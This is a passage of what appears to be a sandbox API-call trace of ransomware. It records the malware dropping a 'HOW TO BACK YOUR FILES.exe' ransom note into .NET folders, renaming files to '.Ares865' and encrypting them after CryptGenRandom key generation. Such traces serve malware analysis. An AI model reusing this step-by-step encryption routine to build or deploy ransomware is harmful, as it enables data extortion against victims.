0 [0128.231] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.231] GetLastError () returned 0x0 [0128.232] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.232] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1f1bbe30, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x524d44e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x524d44e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.232] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.232] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.232] lstrcpyW (in: lpString1=0x2cce44a, lpString2="detection.exe" | out: lpString1="detection.exe") returned="detection.exe" [0128.232] lstrlenW (lpString="detection.exe") returned 13 [0128.232] lstrlenW (lpString="Ares865") returned 7 [0128.232] lstrcmpiW (lpString1="ion.exe", lpString2="Ares865") returned 1 [0128.232] lstrlenW (lpString=".dll") returned 4 [0128.232] lstrcmpiW (lpString1="detection.exe", lpString2=".dll") returned 1 [0128.232] lstrlenW (lpString=".lnk") returned 4 [0128.232] lstrcmpiW (lpString1="detection.exe", lpString2=".lnk") returned 1 [0128.232] lstrlenW (lpString=".ini") returned 4 [0128.232] lstrcmpiW (lpString1="detection.exe", lpString2=".ini") returned 1 [0128.232] lstrlenW (lpString=".sys") returned 4 [0128.232] lstrcmpiW (lpString1="detection.exe", lpString2=".sys") returned 1 [0128.232] lstrlenW (lpString="detection.exe") returned 13 [0128.233] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft.NET\\detection.exe.Ares865") returned 58 [0128.233] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft.NET\\detection.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\detection.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft.NET\\detection.exe.Ares865" (normalized: "c:\\program files (x86)\\microsoft.net\\detection.exe.ares865"), dwFlags=0x1) returned 1 [0128.234] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\detection.exe.Ares865" (normalized: "c:\\program files (x86)\\microsoft.net\\detection.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0xffffffff [0128.234] GetLastError () returned 0x20 [0128.234] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Program Files (x86)\\Microsoft.NET\\detection.exe CreateFile error 32\r\n") returned 80 [0128.234] lstrlenA (lpString="[ERROR] C:\\Program Files (x86)\\Microsoft.NET\\detection.exe CreateFile error 32\r\n") returned 80 [0128.234] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0128.235] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa635 [0128.235] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x50, lpOverlapped=0x0) returned 1 [0128.236] CloseHandle (hObject=0x118) returned 1 [0128.236] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft.NET\\detection.exe.Ares865" (normalized: "c:\\program files (x86)\\microsoft.net\\detection.exe.ares865"), lpNewFileName="C:\\Program Files (x86)\\Microsoft.NET\\detection.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\detection.exe"), dwFlags=0x1) returned 1 [0128.236] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0128.237] CloseHandle (hObject=0x0) returned 0 [0128.237] CloseHandle (hObject=0xffffffff) returned 0 [0128.237] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x524d44e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x524d44e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0128.237] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0128.237] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x524fa640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x524fa640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Primary Interop Assemblies", cAlternateFileName="PRIMAR~1")) returned 1 [0128.237] lstrcmpiW (lpString1="Primary Interop Assemblies", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.237] lstrcmpiW (lpString1="Primary Interop Assemblies", lpString2="aoldtz.exe") returned 1 [0128.237] lstrcpyW (in: lpString1=0x2cce44a, lpString2="Primary Interop Assemblies" | out: lpString1="Primary Interop Assemblies") returned="Primary Interop Assemblies" [0128.237] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0128.237] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x80) returned 0x2f00d8 [0128.237] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0128.237] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a491400, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x524fa640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x524fa640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RedistList", cAlternateFileName="REDIST~1")) returned 1 [0128.237] lstrcmpiW (lpString1="RedistList", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.237] lstrcmpiW (lpString1="RedistList", lpString2="aoldtz.exe") returned 1 [0128.237] lstrcpyW (in: lpString1=0x2cce44a, lpString2="RedistList" | out: lpString1="RedistList") returned="RedistList" [0128.237] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0128.237] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x60) returned 0x2f1fc8 [0128.237] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0128.237] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a491400, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x524fa640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x524fa640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RedistList", cAlternateFileName="REDIST~1")) returned 0 [0128.238] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.238] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bb0 [0128.238] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft.NET\\RedistList", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft.NET\\RedistList") returned="C:\\Program Files (x86)\\Microsoft.NET\\RedistList" [0128.238] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft.NET\\RedistList" | out: lpString1="C:\\Program Files (x86)\\Microsoft.NET\\RedistList") returned="C:\\Program Files (x86)\\Microsoft.NET\\RedistList" [0128.238] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.238] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.239] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.239] GetLastError () returned 0x0 [0128.239] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.239] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a491400, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x524fa640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x524fa640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.239] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.240] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.240] lstrcpyW (in: lpString1=0x2cce460, lpString2="AssemblyList_4_client.xml.Ares865" | out: lpString1="AssemblyList_4_client.xml.Ares865") returned="AssemblyList_4_client.xml.Ares865" [0128.240] lstrlenW (lpString="AssemblyList_4_client.xml.Ares865") returned 33 [0128.240] lstrlenW (lpString="Ares865") returned 7 [0128.240] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.240] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc643900, ftCreationTime.dwHighDateTime=0x1cac666, ftLastAccessTime.dwLowDateTime=0x9ea84660, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0x524fa640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2320, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AssemblyList_4_extended.xml.Ares865", cAlternateFileName="ASSEMB~2.ARE")) returned 1 [0128.240] lstrcmpiW (lpString1="AssemblyList_4_extended.xml.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.240] lstrcmpiW (lpString1="AssemblyList_4_extended.xml.Ares865", lpString2="aoldtz.exe") returned 1 [0128.240] lstrcpyW (in: lpString1=0x2cce460, lpString2="AssemblyList_4_extended.xml.Ares865" | out: lpString1="AssemblyList_4_extended.xml.Ares865") returned="AssemblyList_4_extended.xml.Ares865" [0128.240] lstrlenW (lpString="AssemblyList_4_extended.xml.Ares865") returned 35 [0128.240] lstrlenW (lpString="Ares865") returned 7 [0128.240] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.240] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x524d44e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x524d44e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0128.240] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0128.240] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x524d44e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x524d44e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0128.240] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.240] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79d0 [0128.240] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies") returned="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies" [0128.241] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies" | out: lpString1="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies") returned="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies" [0128.241] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.241] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.241] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.242] GetLastError () returned 0x0 [0128.242] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.242] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x524fa640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x524fa640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.243] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.243] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.243] lstrcpyW (in: lpString1=0x2cce480, lpString2="adodb.dll" | out: lpString1="adodb.dll") returned="adodb.dll" [0128.243] lstrlenW (lpString="adodb.dll") returned 9 [0128.243] lstrlenW (lpString="Ares865") returned 7 [0128.243] lstrcmpiW (lpString1="odb.dll", lpString2="Ares865") returned 1 [0128.243] lstrlenW (lpString=".dll") returned 4 [0128.243] lstrcmpiW (lpString1="adodb.dll", lpString2=".dll") returned 1 [0128.243] lstrlenW (lpString=".lnk") returned 4 [0128.243] lstrcmpiW (lpString1="adodb.dll", lpString2=".lnk") returned 1 [0128.243] lstrlenW (lpString=".ini") returned 4 [0128.243] lstrcmpiW (lpString1="adodb.dll", lpString2=".ini") returned 1 [0128.243] lstrlenW (lpString=".sys") returned 4 [0128.243] lstrcmpiW (lpString1="adodb.dll", lpString2=".sys") returned 1 [0128.243] lstrlenW (lpString="adodb.dll") returned 9 [0128.243] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll.Ares865") returned 81 [0128.244] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\adodb.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\adodb.dll.ares865"), dwFlags=0x1) returned 1 [0128.245] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\adodb.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\adodb.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.245] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=110592) returned 1 [0128.245] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.246] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.246] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.246] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1b300, lpName=0x0) returned 0x170 [0128.248] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1b300) returned 0x190000 [0128.254] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.254] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.254] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.256] lstrcpyW (in: lpString1=0x2cce480, lpString2="Microsoft.mshtml.dll" | out: lpString1="Microsoft.mshtml.dll") returned="Microsoft.mshtml.dll" [0128.256] lstrlenW (lpString="Microsoft.mshtml.dll") returned 20 [0128.256] lstrlenW (lpString="Ares865") returned 7 [0128.256] lstrcmpiW (lpString1="tml.dll", lpString2="Ares865") returned 1 [0128.257] lstrlenW (lpString=".dll") returned 4 [0128.257] lstrcmpiW (lpString1="Microsoft.mshtml.dll", lpString2=".dll") returned 1 [0128.257] lstrlenW (lpString=".lnk") returned 4 [0128.257] lstrcmpiW (lpString1="Microsoft.mshtml.dll", lpString2=".lnk") returned 1 [0128.257] lstrlenW (lpString=".ini") returned 4 [0128.257] lstrcmpiW (lpString1="Microsoft.mshtml.dll", lpString2=".ini") returned 1 [0128.257] lstrlenW (lpString=".sys") returned 4 [0128.257] lstrcmpiW (lpString1="Microsoft.mshtml.dll", lpString2=".sys") returned 1 [0128.257] lstrlenW (lpString="Microsoft.mshtml.dll") returned 20 [0128.257] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll.Ares865") returned 92 [0128.257] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\microsoft.mshtml.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\microsoft.mshtml.dll.ares865"), dwFlags=0x1) returned 1 [0128.259] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\microsoft.mshtml.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.259] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8007680) returned 1 [0128.259] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.260] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.260] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.260] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a3300, lpName=0x0) returned 0x170 [0128.261] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x600000, dwNumberOfBytesToMap=0x1a3300) returned 0x3030000 [0128.443] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.444] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.444] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.469] lstrcpyW (in: lpString1=0x2cce480, lpString2="Microsoft.stdformat.dll" | out: lpString1="Microsoft.stdformat.dll") returned="Microsoft.stdformat.dll" [0128.469] lstrlenW (lpString="Microsoft.stdformat.dll") returned 23 [0128.469] lstrlenW (lpString="Ares865") returned 7 [0128.469] lstrcmpiW (lpString1="mat.dll", lpString2="Ares865") returned 1 [0128.469] lstrlenW (lpString=".dll") returned 4 [0128.469] lstrcmpiW (lpString1="Microsoft.stdformat.dll", lpString2=".dll") returned 1 [0128.469] lstrlenW (lpString=".lnk") returned 4 [0128.469] lstrcmpiW (lpString1="Microsoft.stdformat.dll", lpString2=".lnk") returned 1 [0128.469] lstrlenW (lpString=".ini") returned 4 [0128.469] lstrcmpiW (lpString1="Microsoft.stdformat.dll", lpString2=".ini") returned 1 [0128.469] lstrlenW (lpString=".sys") returned 4 [0128.469] lstrcmpiW (lpString1="Microsoft.stdformat.dll", lpString2=".sys") returned 1 [0128.469] lstrlenW (lpString="Microsoft.stdformat.dll") returned 23 [0128.470] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll.Ares865") returned 95 [0128.470] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\microsoft.stdformat.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\microsoft.stdformat.dll.ares865"), dwFlags=0x1) returned 1 [0128.472] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\microsoft.stdformat.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.472] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13312) returned 1 [0128.472] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.473] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.473] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.473] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3700, lpName=0x0) returned 0x170 [0128.475] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3700) returned 0x190000 [0128.477] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.477] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.477] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.478] lstrcpyW (in: lpString1=0x2cce480, lpString2="msdatasrc.dll" | out: lpString1="msdatasrc.dll") returned="msdatasrc.dll" [0128.478] lstrlenW (lpString="msdatasrc.dll") returned 13 [0128.478] lstrlenW (lpString="Ares865") returned 7 [0128.478] lstrcmpiW (lpString1="src.dll", lpString2="Ares865") returned 1 [0128.478] lstrlenW (lpString=".dll") returned 4 [0128.478] lstrcmpiW (lpString1="msdatasrc.dll", lpString2=".dll") returned 1 [0128.478] lstrlenW (lpString=".lnk") returned 4 [0128.478] lstrcmpiW (lpString1="msdatasrc.dll", lpString2=".lnk") returned 1 [0128.478] lstrlenW (lpString=".ini") returned 4 [0128.478] lstrcmpiW (lpString1="msdatasrc.dll", lpString2=".ini") returned 1 [0128.478] lstrlenW (lpString=".sys") returned 4 [0128.478] lstrcmpiW (lpString1="msdatasrc.dll", lpString2=".sys") returned 1 [0128.479] lstrlenW (lpString="msdatasrc.dll") returned 13 [0128.479] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\msdatasrc.dll.Ares865") returned 85 [0128.479] MoveFileExW 